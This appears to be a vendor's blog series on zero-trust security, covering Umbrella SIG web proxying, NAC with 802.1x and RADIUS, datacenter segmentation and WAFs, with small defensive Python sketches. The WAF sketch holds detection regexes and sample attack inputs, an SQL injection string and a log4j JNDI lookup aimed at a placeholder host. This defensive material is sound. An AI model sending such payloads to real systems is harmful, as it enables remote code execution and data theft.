Umbrella SIG – Your Field Guide to Protecting the Remote User

The Problem

Here’s the situation – you have a group of users who work a hybrid schedule. One of them, while working at home, picks up malware from a compromised website. That infected PC then comes back to the office and onto the corporate network, where the malware can try to spread to other devices. How do we protect against this kind of situation?

Historically, tools to manage remote device security on the endpoint itself were limited in their security capabilities or had undesirable effects on user experience. Alternately, remote users would be required to VPN into the corporate office at boot, with all traffic sent over the VPN for processing by the on-premises security stack. The first issue with that approach is load: with many remote users, the corporate firewall and Internet connections come under considerable strain, perhaps enough to demand a larger firewall and faster circuits. Second, there’s the question of what happens when the endpoint is off the VPN – malware or user misbehavior is still possible in that window. Setting up endpoints for always-on VPN (where the tunnel establishes itself pre-logon, usually with certificate-based authentication) is a possibility, but always-on VPN is notoriously complex and finicky to deploy, making it a poor solution for most organizations.

Advanced Threats

Another demand on security is SSL decryption for threat detection. Modern malware uses SSL encryption too, and is much harder to detect without decrypting and inspecting that traffic. SSL decryption on an on-premises firewall has a substantial performance impact – often cutting firewall throughput in half or more – which makes it impractical for the traditional full-tunnel VPN option.

A New Defense

These days, we have better tools. A whole class of services known as SASE (secure access service edge) has arisen in response to the need to secure a distributed workforce. However, SASE services differ quite a bit in how they’re implemented. Most require some form of always-on VPN to connect to the SASE service – with all the complexity that entails – to avoid the problem of what happens when the user isn’t connected.

Our preferred SASE solution for remote workers is Umbrella SIG, as it addresses all the common problems I’ve discussed above.  SIG works a bit differently than other solutions, as it doesn’t rely on VPN connectivity.  Instead, traffic destined for the Internet gets proxied through the Umbrella cloud, where SSL decryption occurs, followed by inspection and filtering for malware and content restrictions. 

Agile and Effective: Umbrella SIG

So, what can SIG do from a security perspective? Here are the key capabilities:

  • File download scanning – files that match known malware signatures are blocked.
  • File type control – disallow users from downloading risky file types. For example, no normal user needs to download a .dll file to their laptop.
  • Detailed content filtering – block not just domains, but specific URLs within a domain. This is especially important with large, sprawling sites like Reddit that contain both legitimate and risky content.
  • Data Leak Prevention (DLP) – scan Internet-bound traffic for well-known or user-defined data patterns that match controlled data such as credit card numbers or intellectual property.
  • SaaS Tenant Controls – keep users contained to the organization’s tenant for services like Microsoft 365.
  • CASB – Discover ‘shadow IT’ SaaS application usage and block access to those apps as needed.
  • Logging and Reporting – Get a clear picture of remote users’ Internet activities and what security events each user has caused.
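To make the DLP bullet concrete, here’s a minimal sketch of how a credit-card pattern might be matched – a candidate regex plus the Luhn checksum to weed out random digit strings. The pattern and function names are illustrative, not Umbrella’s actual implementation.

```python
import re

# Candidate pattern: 13-16 digits, optionally separated by spaces or dashes.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,15}\d\b")

def luhn_ok(number: str) -> bool:
    """Luhn checksum used to weed out random digit strings."""
    digits = [int(d) for d in number if d.isdigit()]
    if not 13 <= len(digits) <= 16:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def find_card_numbers(text: str) -> list[str]:
    """Return substrings that look like card numbers AND pass the checksum."""
    return [m.group() for m in CARD_RE.finditer(text) if luhn_ok(m.group())]
```

Real DLP engines layer context (nearby keywords like “expiry” or “CVV”) on top of this to cut false positives.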

SIG Simplifies Deploying SSL Decryption

Deploying SIG is much easier than most other SASE services thanks to how it operates. As mentioned before, there is no need for always-on VPN or other invasive endpoint configurations that can break easily. Core features can also be implemented quickly – where there is complexity, it’s inherent to the features themselves rather than to setting up prerequisites. For example, SSL decryption will always need a certificate installed on the endpoint to avoid breaking the Internet, and choosing what to decrypt often needs input from other parts of the organization to ensure users’ private information isn’t compromised (think banking or medical information – data that can create liability for the organization if inspected.)

Your Umbrella SIG Deployment Guide

Here’s a guide to getting SIG up and running – this assumes that you currently have a fully functional Umbrella DNS deployment and want to expand that to SIG. I don’t go into the more complex features here, so consider this a starting point, not an authoritative guide.


Enable the Secure Web Gateway (SWG) capability. Note that this requires the new Cisco Secure Client (aka AnyConnect 5.0 or later) to work. SWG can be enabled globally or on a per-identity basis.

Install the Umbrella root certificate on the PCs/Macs to protect. Alternately, if you already have a local CA, your cert can be used in place of the Umbrella cert. Without this, enabling SSL decryption will completely break the Internet for the unfortunate users.
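One quick way to confirm decryption is working for a given endpoint is to connect to a test site and check which CA issued the certificate actually presented – if it’s the Umbrella root (or your local CA), the proxy is in the path. A rough sketch, assuming the decryption root is already trusted locally; the CA common name shown is an assumption, so substitute whatever your installed root actually uses.

```python
import socket
import ssl

def issuer_cn(peercert: dict) -> str:
    """Pull the issuer commonName out of the dict returned by getpeercert()."""
    for rdn in peercert.get("issuer", ()):
        for key, value in rdn:
            if key == "commonName":
                return value
    return ""

def decryption_active(host: str, ca_cn: str = "Cisco Umbrella Root CA") -> bool:
    """True if the cert presented for `host` was issued by the decryption CA.

    Assumes that CA is already in the local trust store; otherwise the
    TLS handshake itself will fail, which is also a useful signal.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((host, 443), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return issuer_cn(tls.getpeercert()) == ca_cn
```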

Next, define a list of categories, applications, and URLs to bypass SSL decryption. Some sites will need to be bypassed for functionality purposes (ex: Windows Update) while others will need to be bypassed for non-technical reasons (banking, health, or other sites that can leak protected information.)

Now it’s time to set up a SWG policy. First, we create a destination list (or several, as needs dictate). Destination lists are how content filtering policies are applied. If you have a pre-built list of domains and URLs to filter, they can be imported into a destination list via .csv file.
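Cisco documents the exact import format; as a rough sketch, a destination list import is essentially one domain or URL per row, which is easy to generate from an existing blocklist:

```python
import csv
import io

def build_destination_csv(destinations: list[str]) -> str:
    """Render a one-column CSV, one domain or URL per row, for bulk import."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    for dest in destinations:
        writer.writerow([dest])
    return buf.getvalue()

# Hypothetical entries - domains filter everything, URLs filter one path.
csv_text = build_destination_csv(["badsite.example", "bigsite.example/risky/path"])
```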

Next, we configure the Web policy.

First, configure the global settings for the ruleset. This is where SSL decryption, file controls, logging, and general security settings are configured. Let’s start with SSL Decryption.

Enable the feature and associate a selective decryption list with it. Next, configure the other global settings as appropriate.

Following this, configure a ruleset for content filtering using the destination lists we created earlier. The individual rules follow the same mode of operation as an ACL – once a match occurs, traffic is either blocked or forwarded, so be careful of rule order to avoid shadowing. Be sure to add identities to each rule and ruleset for them to be applied!
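The first-match behavior that makes rule order matter can be sketched in a few lines – note how the second rule’s `news.example` entry still works, while its `social.example` entry is shadowed by the rule above it (destinations are hypothetical):

```python
# Each rule: (destinations it matches, action). First match wins, like an ACL.
RULES = [
    ({"social.example"}, "block"),
    ({"social.example", "news.example"}, "allow"),  # partly shadowed by rule 1
]

def evaluate(destination: str, rules=RULES, default="allow") -> str:
    for destinations, action in rules:
        if destination in destinations:
            return action  # first match wins; later rules never see this traffic
    return default
```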

Finally…

Test SWG settings before rolling it out to the entire organization. Note that once SWG is enabled globally, any endpoint with Secure Client and the Umbrella agent component will then forward all traffic to the Umbrella cloud to be proxied. No policy is applied unless identities are added to rulesets, so impact will be minimal until appropriate rulesets and identities are configured.

Zero Trust in the Campus

Controlling Network Access

Securing Infrastructure Access

Among the major risks to the security and functionality of IT infrastructure, access to that infrastructure ranks near the top. Being able to ensure that only authorized devices and users can connect to the network is one of the most effective ways of protecting your infrastructure and data. Users who pick up malware outside the corporate network can easily bring it in on their machines, or bad actors can plant a device within the network to launch attacks on the infrastructure from the inside. And it’s not just a security thing – one of the most aggravating components of ‘shadow IT’ is the random devices users bring in and attach to the network. Printers are probably the most common, but other things like networked music players are a notable hassle. Worst of all are users bringing in network devices like unmanaged switches, which can actually cause an outage. Situations like this are what network access control (NAC) systems are for.

So what is a NAC system?

In a nutshell, the primary job of a NAC system is to authenticate users and devices so that they can use the organization’s network, and then log those accesses. More advanced NAC systems can also provide conditional access – a device joining the network can be profiled and screened for things like an up-to-date OS or the presence of antimalware software, or even forced to run an antimalware scan prior to gaining full access to the network. The most complex NAC deployments add network segmentation to all of the above – users are dynamically assigned to a VLAN or SSID, or have a dynamic ACL applied, based on their role in the organization.

How do NAC systems function?

NAC systems, regardless of vendor, all rely on the same core technologies to function: RADIUS and 802.1x. This is meant as a short overview, not a deep dive into the intricacies of either. We’ll also avoid vendor-specific capabilities, such as Cisco’s Scalable Group Tags (SGTs), as those don’t see much use and rely on a single-vendor environment. First is 802.1x, the core technology for allowing or disallowing access to the network. Keep in mind that 802.1x is a function of the access device (switch port or wireless AP), not the NAC software – it’s common to see a NAC system from one vendor and access switching from another in the same environment.

NOTE: All modern OSes (Windows, Linux, MacOS) have 802.1x client (aka supplicant) functionality built in, so no 3rd party software is necessary on the client side.

Besides standard client OSes, 802.1x client functionality also exists in a number of specialty devices, including network infrastructure like routers, switches, and APs.  We’ll address that use case later.  The other thing to keep in mind about 802.1x is that it’s a layer 2 protocol – authentication information is sent even before a device can get an IP address.  That way, it’s simply not possible for unauthenticated devices to obtain an IP address in a well-designed NAC deployment. 
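To illustrate the layer 2 point: an 802.1x exchange starts with an EAPOL frame – a raw Ethernet frame with EtherType 0x888E sent to a reserved multicast MAC, no IP header anywhere. A sketch of the EAPOL-Start frame a supplicant sends to kick things off:

```python
# EAPOL-Start: sent by the supplicant to begin 802.1x, entirely at layer 2.
PAE_GROUP_ADDR = bytes.fromhex("0180c2000003")  # reserved 802.1x multicast MAC
ETHERTYPE_EAPOL = b"\x88\x8e"

def eapol_start_frame(src_mac: bytes) -> bytes:
    version = b"\x02"      # EAPOL version 2 (802.1X-2004)
    packet_type = b"\x01"  # 1 = EAPOL-Start
    length = b"\x00\x00"   # EAPOL-Start carries no body
    return PAE_GROUP_ADDR + src_mac + ETHERTYPE_EAPOL + version + packet_type + length

# Hypothetical supplicant MAC - note there's no IP address anywhere in the frame.
frame = eapol_start_frame(bytes.fromhex("aabbccddeeff"))
```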

What if the device in question is a printer, IP phone, or other device without 802.1x awareness? 

There is a feature available called MAC Authentication Bypass (MAB) that forgoes the 802.1x process and instead uses the device’s MAC address (learned from a single frame) as the credential to authenticate against. Keep in mind that MAB is not very secure – spoofing MAC addresses is very easy to do, especially with wireless devices. MAB shouldn’t be used except as a last resort, and additional security, such as network segmentation via a firewall, should always be considered when dealing with devices that must use MAB.
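Because MAB’s only credential is the MAC address, the pre-populated list has to tolerate the different formats switches and admins use (colons, dashes, Cisco’s dotted quads). A small, hypothetical sketch of the normalization step:

```python
import re

def normalize_mac(mac: str) -> str:
    """Reduce aabb.ccdd.eeff / AA:BB:CC:DD:EE:FF / aa-bb-... to aabbccddeeff."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits

# Hypothetical pre-populated MAB list (printers, phones, etc.)
ALLOWED_MABS = {normalize_mac(m) for m in ["00:1A:2B:3C:4D:5E", "001a.2b3c.4d60"]}

def mab_permitted(mac: str) -> bool:
    return normalize_mac(mac) in ALLOWED_MABS
```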

Further explaining the authentication process

The other part of the authentication process is the access device communicating with the NAC server.  This back-end communication is done using RADIUS.  RADIUS has a very long history as an AAA protocol, dating back to the days of dial-up Internet, and has stuck around because its capabilities are broadly useful for all manner of network access control regardless of media type.  Once an access device has received 802.1x information, it will translate that to a RADIUS request and send it on to the NAC server.  From there, the NAC server will consult its internal user and machine database or an external user database (e.g. Windows Active Directory) to determine if the device should be granted access to the network.  In the case of MAB, that will be a pre-populated list of MAC addresses that the NAC server will refer to.  RADIUS doesn’t just handle authentication, either.  RADIUS can be used to push a dynamic ACL based on user role or device type, or dynamically assign a port to a specific VLAN based on user role or device type.  This kind of dynamic segmentation is quite advanced, though, and is definitely not for a NAC beginner.
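Dynamic VLAN assignment, for instance, is carried in three standard RADIUS attributes on the Access-Accept (Tunnel-Type, Tunnel-Medium-Type, Tunnel-Private-Group-ID). A sketch of a NAC server’s authorization step – the role-to-VLAN mapping is invented for illustration:

```python
ROLE_TO_VLAN = {"engineering": "110", "finance": "120", "printer": "200"}  # hypothetical

def access_accept_attrs(role: str) -> dict:
    """RADIUS attributes telling the switch which VLAN to place the port in."""
    vlan = ROLE_TO_VLAN.get(role)
    if vlan is None:
        return {"Reply-Message": "no role mapping"}  # leave port on default VLAN
    return {
        "Tunnel-Type": 13,                # 13 = VLAN
        "Tunnel-Medium-Type": 6,          # 6 = IEEE-802
        "Tunnel-Private-Group-ID": vlan,  # the VLAN ID the switch should assign
    }
```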

Now, let’s discuss NAC deployment

Our prior topics have generally been invisible to end users and limited to key points within the enterprise network.  Thus, even with areas that have complex security needs, like machine-to-machine security in the datacenter, there is minimal worry about messing with the end user experience or causing high-visibility problems.  NAC changes that dramatically – now we’re directly impacting end user experience if things go wrong.  To be honest, we’ll be directly impacting end user experience when things go right – remember that a NAC system is not just security, but shadow IT control. Expect user complaints when the printer they snuck in no longer works.  It still beats having people sneak in printers, in my opinion.

Deploying NAC is going to be complex

This article is not trying to be a complete guide to NAC deployment. Rather, I want to discuss general principles and best practices to make sure that your NAC deployment doesn’t cause too much pain. The first thing to consider is where 802.1x should be enabled. Best practice says that any means of network access (switch ports, APs) that isn’t in a secured environment should be enabled for NAC. That’s why APs and switches come with 802.1x supplicant capabilities – a user-accessible AP or small switch in an office could otherwise be unplugged and an unapproved device attached to the network. You’ll also want to inventory network devices and determine where MAB will be necessary. Be sure to record those MAC addresses, too.

So what’s next?

The initial deployment is the next step. Build the NAC servers, integrate with any external resources like AD, and start with a small test deployment.  The IT department always makes for a good guinea pig.  This test deployment should start in open mode – network access is always allowed, but all 802.1x and RADIUS exchanges are logged.  Review the logs and address any errors, then move to closed mode, where network access is now conditional on successful authentication.   There will likely be some issues that weren’t caught or only appear in closed mode.  Make note of anything particularly troublesome for when the wider deployment is carried out.

Next, prepare for the general rollout

Since this involves client machines, make sure the helpdesk team is in the loop and trained to deal with the inevitable issues, and work closely with the desktop team to make the changes needed to enable 802.1x (for a Windows shop, traditional GPOs or Intune can do this). Procedures will also need to be updated – don’t forget that. It’s way too easy for NAC to turn into an unmanageable mess without good procedures. Above all, communicate with users about the process well in advance. Be sure to have a good answer for things like printers and other devices brought in by users. Just cutting them off causes more problems than it solves, no matter how satisfying it may be. This is, honestly, the hardest part of a NAC deployment and the biggest cause of failures. Nothing sinks a project faster than agitated users and their managers. Now is also the time to remediate any issues found in the pilot deployment if they appear to be widespread.

You’re done prepping, it’s time to deploy

Now that the preparatory work has been done, it’s time to move on to the large-scale deployment. Feel free to split this up further for large deployments or if there are lots of remote sites. Just like the pilot, start with everything in open mode and log errors or failed authentications. Remedy those issues as appropriate. Once the technical issues have been resolved and any ruffled feathers have been un-ruffled, it’s time to move to closed mode. Once again, communication from IT to the rest of the organization is key. I can’t state enough how important it is, really. No matter how much work is done prior to this step, there will be issues. Address the users with respect and courtesy, and always be flexible. It’s not uncommon for some devices to just plain refuse to work with 802.1x no matter what, short of a full reimage.

Some final thoughts

NAC systems are a powerful tool in your journey towards zero trust, but the user impact should always be top of mind.  This is definitely one of those projects where a good services partner can have a big impact – a team that’s done dozens of NAC deployments has seen numerous ways things can go wrong and can streamline the NAC deployment dramatically.

By Chris Crotteau

Machine to Machine Security

Zero Trust in the Datacenter – Machine to Machine Security

How Machine to Machine security differs from User to Machine

Now that we’ve looked at user to machine security in the datacenter, it’s time to look at machine to machine security (also known as east-west security). The goals of machine to machine security are quite different from user to machine security, and will also depend on what types of applications and uses your datacenter has. For most datacenter environments, the primary goal of machine to machine security is to provide a last line of defense in case an intruder has managed to gain a foothold in your organization’s infrastructure. This is not a reason to ignore machine to machine security!

Remember: One of the core parts of the zero trust philosophy is to expect that intrusions will happen or may even be happening right now. 

Without machine to machine security, an intruder who gains access to or control over a server has free rein to move laterally to other, more important machines that may contain valuable data, and to do so undetected (or at least until everything’s encrypted and you’re being asked for Bitcoin). Once we add machine to machine security, moving laterally within the datacenter becomes a much bigger challenge – working around security and avoiding detection takes time and skill, buying you enough time to detect the intrusion before it can succeed. At a lower level, the goal of machine to machine security is to ensure that servers (whether bare metal or virtualized) only ever communicate with other specific servers, and only using the ports and protocols needed for application functionality. Anything out of the ordinary should be logged, and certain traffic types should raise an alert when detected.

An example of this would be two servers that only communicate via HTTPS – only port 443 should be allowed, and if one server attempts to open an SSH session to the other server, immediately email the security team – bad things are afoot if that’s happening.
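That example policy can be sketched as a simple flow check – permit the documented HTTPS flow, and treat server-to-server SSH as a signal worth alerting on (the hostnames and whitelist are hypothetical):

```python
import logging

ALLOWED = {("web-01", "db-01", 443)}  # hypothetical documented flows
ALERT_PORTS = {22}                    # server-to-server SSH warrants an alert

def check_flow(src: str, dst: str, port: int) -> str:
    """Return the action for a flow: permit, deny, or deny with an alert."""
    if (src, dst, port) in ALLOWED:
        return "permit"
    if port in ALERT_PORTS:
        logging.warning("ALERT: %s -> %s on %d - possible lateral movement", src, dst, port)
        return "deny+alert"
    logging.info("denied: %s -> %s on %d", src, dst, port)
    return "deny"
```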

How do we implement Machine to Machine security?

With the importance of machine to machine security now clear, it’s time to discuss how it can be implemented. Before any purchases of hardware or software are made, planning and design work is key – machine to machine security is complex, no way around it, and good planning makes for a successful deployment. The first step is to build a data flow diagram – map out which machines should talk to which other machines and which ports should be allowed. This will be the primary document used to build the security policy, so do not neglect it. Next, determine as best as possible what the east-west throughput needs are. Security throughput is expensive, and in the context of datacenter traffic flows, potentially a substantial bottleneck. There are a couple of ways to effectively provide machine to machine security, but to start with, there’s one way this shouldn’t be done, and that’s with traditional security ACLs.
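The data flow diagram doesn’t have to stay a drawing – captured as a structure, it can generate the security policy directly. A sketch with hypothetical tiers and ports:

```python
# Hypothetical data flow diagram captured as code: who may talk to whom, on what.
FLOWS = {
    ("web", "app"):   [8443],
    ("app", "db"):    [5432],
    ("app", "cache"): [6379],
}

def generate_rules(flows: dict) -> list[str]:
    """Emit one permit rule per documented flow, with an implicit deny last."""
    rules = [f"permit {src} -> {dst} tcp/{port}"
             for (src, dst), ports in flows.items() for port in ports]
    rules.append("deny any -> any")
    return rules
```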

Note: While an ACL is a simple way to better secure things for user to machine security, ACLs in the context of machine to machine security are unwieldy and hard to manage. This leads to hard-to-troubleshoot connectivity problems or to user error accidentally leaving open things that shouldn’t be.

The preferred tools are physical or virtual firewalls – central management reduces the possibility of user error, and advanced security features mean more effective filtering, logging, and alerting. The easier way to do east-west security is to segment based on server group. In this kind of setup, like servers can communicate with each other directly, but must traverse a firewall to communicate with other types of servers. For example, a database server cluster can freely communicate with its other cluster members, but to communicate with a web server, the traffic has to pass through a firewall. This kind of segmentation tends to be easier to maintain and has minimal performance impact (assuming the firewall is sized correctly), since filtering is done on a limited scale and can be centralized in a single pair of security appliances. No host involvement is needed and device count is low, so small teams can effectively manage datacenter segmentation this way.
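The group-based model boils down to one decision per flow – a sketch, with hypothetical group assignments:

```python
# Hypothetical server-to-group assignments.
SERVER_GROUPS = {"db-01": "database", "db-02": "database", "web-01": "web"}

def path_for(src: str, dst: str) -> str:
    """Same-group traffic flows directly; cross-group traffic hits the firewall."""
    if SERVER_GROUPS[src] == SERVER_GROUPS[dst]:
        return "direct"
    return "via-firewall"
```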

Complex datacenters and Machine to Machine security

For those organizations that provide multitenant services or who have the budget and staff to handle a very complex datacenter environment, the best security is provided through microsegmentation – instead of segmenting based on server group and only firewalling communications between groups, microsegmentation is the firewalling of every server from every other server.  The benefits are obvious – with every server’s traffic being inspected, the ability to detect and quarantine a compromised server before damage is done is much more robust.  This does come at the expense of significant deployment and maintenance complexity, though.  On the deployment side, microsegmentation can’t be effectively done with a pair of firewalls in the services leaf. Instead, a host-based system like VMWare NSX, per-host deployments of a virtual firewall like the Palo Alto VM series, or a microsegmentation-oriented networking system like Cisco’s ACI will be needed to ensure security throughput scales with host count.  On the management side, some form of automated rule creation is necessary – each VM deployed has its own security rules, and manually adding those rules to each firewall instance every time a new VM is deployed is not a practical thing to do.  This means building, testing, and maintaining a scripting infrastructure alongside everything else needed for proper microsegmentation. 

Combining the Machine to Machine strategies

Another approach to machine to machine security is a hybrid of both models – high-risk servers like Internet-facing web servers are subject to microsegmentation, while other types of applications only have filtering between server groups. This approach can tame the potentially extreme complexity of a full microsegmentation environment for applications that aren’t as much of a security risk, while gaining the security advantages for the servers most likely to end up compromised.

What is a Zero Trust Philosophy?

Zero Trust: It’s a philosophy, not a plan

The Mindset

One of the current trends in IT security that gets a lot of press and discussion is the idea of zero trust. Zero trust, however, is really a philosophy, not a plan of action. Specifically, it’s the philosophy that all IT resources, whether internal or external, should be treated as untrusted or even potentially compromised. While the philosophy is simple, applying it to a live environment can be anything but! Adopting a zero trust mindset requires a holistic approach to security and good cooperation between all stakeholders in the organization. It extends beyond the technology infrastructure to the employees and even organizational policies themselves.

It’s important to keep in mind that the threat landscape is always changing – what may have been good practice five years ago may not be so today. This is what drove us at Crossconnect to develop a series of posts laying out how to adopt a zero trust philosophy in your organization.

Getting Started

This series will explore various aspects of technology infrastructure with an eye towards how things are built with a zero trust mindset. Before we get into those details, it’s always best to take some time to think about the big-picture questions – many of the areas of security we’ll talk about have options that range from ‘very simple’ to ‘year-long project.’ Being able to figure out where effort needs to be made will go a long way towards creating an effective security infrastructure for your organization.

Foundations of Zero Trust Philosophy

The first step in planning is to think about the capabilities of your organization and the threats you’re likely to face. Many threats are industry- or organization-specific, but some are universal. First, of course, is ransomware – probably the biggest general threat most organizations will face. Fraud and theft also rank high. Sometimes the organization’s data itself is the target – there are plenty of groups out there who want confidential information for any number of reasons, even just to leak it to the public. And finally, bad actors may compromise your organization as a stepping stone to a 3rd party’s network – think contractors and other service providers.

Next, look at your internal capabilities.  Security is, unfortunately, time-consuming to manage.  As such, it gets hard to manage some solutions with limited staff and budget.  Consider what your organization is capable of managing and monitoring when looking at security products and services – a simple but well-managed system is going to be more effective than a very capable, yet complex and maintenance-intensive system that gets neglected.

Once you have a good understanding of your threats and capabilities, it’s time to build a plan. The core of a security plan is to look at the applications in use, the files and information they handle, and the infrastructure they run on, then figure out who and what needs access. The goal is to limit access for any device, user, or application to only the resources it needs.

Zero Trust Philosophy Index

This series will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.  

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

User to Machine Security

Zero Trust in the Datacenter – Protecting Your Servers from Your Users

For the first part of our explorations of the zero trust philosophy, we’re going to look at the datacenter. 

It’s All in the Flow

When we look at the datacenter, we have two types of traffic flows, each of which needs to be examined from a security perspective. First is user to machine security. Protecting one’s datacenter resources from the users has always been a necessity; however, the types of threats, and what we consider a user, have changed a lot over the years. Second is machine to machine security. This area of datacenter security is much newer and has historically been challenging and expensive to implement. We’ll focus on user to machine security for now – machine to machine security will be discussed in a future post.

Note: What we discuss here can easily be applied to servers located on-prem, co-located, or even in the public cloud. 

On to User to Machine Security

The primary type of user to machine security is what’s commonly referred to as north-south security, where the focus is on Internet users.  Exposing necessary resources to the Internet is a requirement for obvious reasons, but Internet-based threats are omnipresent and can be of considerable sophistication.  It may seem obvious, but it bears repeating that any security policy should be built with only the necessary access privileges granted.  For Internet-facing users, this is usually easy – modern websites/applications usually just require that HTTP/HTTPS traffic coming in on ports 80 and 443 is allowed.  Legacy applications can complicate this process, though, so always work with the application team to understand all requirements for the application to function and build access policies appropriate to your environment.

Beyond simple access controls, it’s important to also consider what the users are inputting into the application. 

For example, putting malicious information in an HTTP POST request is a very common way of trying to get the application to give up information, grant inappropriate access, or otherwise misbehave in a way beneficial to the attacker. How to abuse application inputs is firmly out of scope for this post – whole books have been written on exploiting things at the application level. Addressing this kind of abuse is more complicated, too. Port and protocol filtering is really a go/no-go type of rule, while inspecting inputs is far messier due to the much more open nature of user input. There are application best practices for sanitizing user inputs, but especially with proprietary applications, it’s not always possible to do so. It’s also better to stop malicious traffic before it ever touches the application. For this, we most commonly use a web application firewall (WAF).

What is a WAF?

With a WAF, we can look directly at the payload of interesting packets and filter based on their contents.  For example, a field on a website that’s meant for name input shouldn’t ever have SQL syntax appearing in it.  On the WAF, a rule is created (using lots of regexes!) to identify anything like this and block it.  WAFs and similar application-specific security tools are, unfortunately, a Very Hard Thing to implement.  The nature of a WAF means that HTTPS traffic needs to be decrypted, which presents challenges in not breaking TLS.  Once that’s been dealt with, building appropriate rules requires close collaboration between the security and application teams to ensure that the WAF is blocking everything it should be, and that rules are updated as applications change or as new threats emerge.  The infamous log4j vulnerability is one that a good WAF rule can easily block, but building that rule requires solid regular-expression skills and an understanding of how the vulnerability is exploited.  To see what a sample WAF rule blocking log4j exploit attempts looks like, F5 has a ready-to-go iRule available here.
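To illustrate the kind of pattern matching a WAF rule performs, here is a Python sketch using regexes to flag SQL syntax in a name field and log4j-style JNDI lookup strings.  These patterns are deliberately simplified for readability – production signatures (such as the F5 iRule mentioned above) are far more thorough and handle the many obfuscation tricks attackers use.

```python
import re

# Simplified illustrations of WAF-style signatures; real rules are far more thorough.
SQLI_PATTERN = re.compile(r"('|--|;|\b(select|union|insert|drop|or)\b)", re.IGNORECASE)
LOG4J_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def inspect_field(value: str) -> str:
    """Return 'block' if the input matches a known-bad pattern, else 'allow'."""
    if SQLI_PATTERN.search(value) or LOG4J_PATTERN.search(value):
        return "block"
    return "allow"

print(inspect_field("Alice Smith"))                    # allow
print(inspect_field("x' OR '1'='1"))                   # block - SQL syntax in a name field
print(inspect_field("${jndi:ldap://evil.example/a}"))  # block - log4j-style lookup string
```

This also shows why rule building needs the application team in the room: an over-broad pattern like the one above would happily block a legitimate customer whose company name contains the word “union”.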

Other User to Machine Security Considerations

The next part of user to machine security is a somewhat newer topic in security – protecting your datacenter resources from your own users.  This is also referred to as internal segmentation.  Historically, trying to firewall your users off from your datacenter was difficult, expensive, and of limited value.  Times have changed, and we’re at a point where your users can be as dangerous to the business as an Internet-based threat.  Studies of where attacks gain their initial foothold show that 90% or more of attacks begin with a user opening a malicious email or running a bad executable.  Once running, the malware will crawl the network looking for vulnerabilities that let it reach the datacenter, then go to work exfiltrating or encrypting data or otherwise disrupting business operations.  With a traditional setup where internal users are considered trustworthy, their traffic is considered good by default and doesn’t warrant being firewalled.  Given the statistic above, this is not a good stance to take.

Callout: Internal segmentation of some variety should be considered a need-to-have in a modern security-first network design. 

Implementing Internal Segmentation

This is one of those tasks whose complexity is hard to estimate up front.  On the simple end of the spectrum, putting some basic security ACLs in place at the border device between the DC and the users is surprisingly effective for the amount of effort it takes to implement.  Most organizations should be looking at a firewall for this purpose, though.  Modern firewalls have many more options for inspecting traffic, detecting threats, and alerting IT staff when something is detected.  Some features are actually easier to implement on an internal segmentation firewall, too.  SSL inspection is one of the best examples of this.  Cracking open TLS traffic is a notoriously resource-intensive task, and if done for Internet-bound traffic, it can easily overwhelm a firewall, break websites, or potentially cause HR issues when specific types of user communications are inspected (banking and health information are two major no-nos for deep packet inspection).  SSL inspection between users and the datacenter has none of these concerns.  Traffic volumes between users and the DC are often well-known and don’t change much, so firewalls can be sized effectively to avoid performance issues.
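The “basic ACLs at the border” approach can be sketched simply.  Below is an illustrative Python model, assuming a hypothetical user VLAN and datacenter subnet: user-to-DC traffic is matched against a small allow-list of known-needed flows, and anything else is denied and logged so IT staff can be alerted.

```python
from ipaddress import ip_address, ip_network

# Hypothetical subnets for illustration only.
USER_VLAN = ip_network("10.10.0.0/16")
DC_SUBNET = ip_network("10.20.0.0/16")

# Allow-list of (destination server, port) pairs users legitimately need.
ALLOWED_FLOWS = {("10.20.1.10", 443), ("10.20.1.20", 445)}

alerts = []

def check_flow(src_ip: str, dst_ip: str, dst_port: int) -> bool:
    """Permit only allow-listed user-to-DC flows; log everything denied."""
    if ip_address(src_ip) in USER_VLAN and ip_address(dst_ip) in DC_SUBNET:
        if (dst_ip, dst_port) in ALLOWED_FLOWS:
            return True
        alerts.append(f"denied {src_ip} -> {dst_ip}:{dst_port}")
        return False
    return False  # anything not explicitly modeled here is denied

print(check_flow("10.10.5.5", "10.20.1.10", 443))   # True - allowed web access
print(check_flow("10.10.5.5", "10.20.1.10", 3389))  # False, and an alert is logged
```

The logged denies are as valuable as the blocks themselves – a user workstation suddenly probing RDP on datacenter hosts is exactly the malware-crawling behavior described above, and the deny log is often the first place it shows up.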

For user information concerns, interaction with internal resources and data is pretty much open season for whatever security you want to implement – there’s nothing in, say, an employee’s interactions with the organization’s ERP system that would be out of bounds to inspect, log, and audit.

Some Final Considerations

One final thing to consider is how to treat access for 3rd party contractors and how to properly categorize their traffic.  The prevailing wisdom these days is to treat 3rd party contractors as equivalent to Internet-facing users, as several high-profile intrusions were launched via a 3rd party with direct access to sensitive resources.  It’s a little more difficult, though – simply allowing ports 80 and 443 through to a list of servers isn’t enough.  3rd party contractors may need specialized access or just a larger number of permit rules than either an employee or an Internet user, so close coordination with your 3rd party is required to keep access requirements to a minimum.  Due to the complexity of building network-based security policies suitable for contractors, another option we’re seeing adopted more lately is the deployment of jump servers with enhanced access management software, such as what Bomgar or SecureLink provide.  This type of software gives IT staff additional capabilities, such as full session monitoring, access notification, and the ability to allow logins only at specific times or only when explicitly approved by the IT staff.  With this level of control on the jump server, it becomes easier to build other security policies in a much more general way.  Since all users access resources via a jump server, access control rules only have to permit a small number of hosts from known subnets, and detailed application-based or port/protocol-based rules can often be omitted or reduced in 